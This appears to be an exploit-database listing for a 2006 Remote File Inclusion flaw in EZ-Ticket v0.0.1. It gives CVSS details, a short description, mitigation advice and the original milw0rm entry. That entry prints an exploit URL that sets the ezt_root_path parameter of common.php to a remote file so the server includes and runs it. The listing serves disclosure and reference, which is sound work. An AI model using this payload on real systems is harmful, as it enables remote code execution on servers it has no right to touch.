header-logo
Suggest Exploit
vendor:
EZ-Ticket
by:
the master (nidhal)
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: EZ-Ticket
Affected Version From: 0.0.1
Affected Version To: 0.0.1
Patch Exists: YES
Related CWE: N/A
CPE: a:ezt:ezt:0.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

EZ-Ticket v0.0.1 Remote File Inclusion Vulnerability

EZ-Ticket v0.0.1 is vulnerable to a Remote File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. The malicious URL contains a malicious file which is then included in the application. This can lead to the execution of arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files. Additionally, the application should be kept up to date with the latest security patches.
Source

Exploit-DB raw data:

########################################################################
#  EZ-Ticket v0.0.1  Remote File Inclusion Vulnerability
#
#  Download: http://prdownloads.sourceforge.net/ezt/ezt-0.01.tar.gz?download
#
#  Found By: the master (nidhal)
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/common.php?ezt_root_path=http://cmd.gif?
########################################################################

# milw0rm.com [2006-10-22]

Navigation

Suggest Exploit

Services By CQR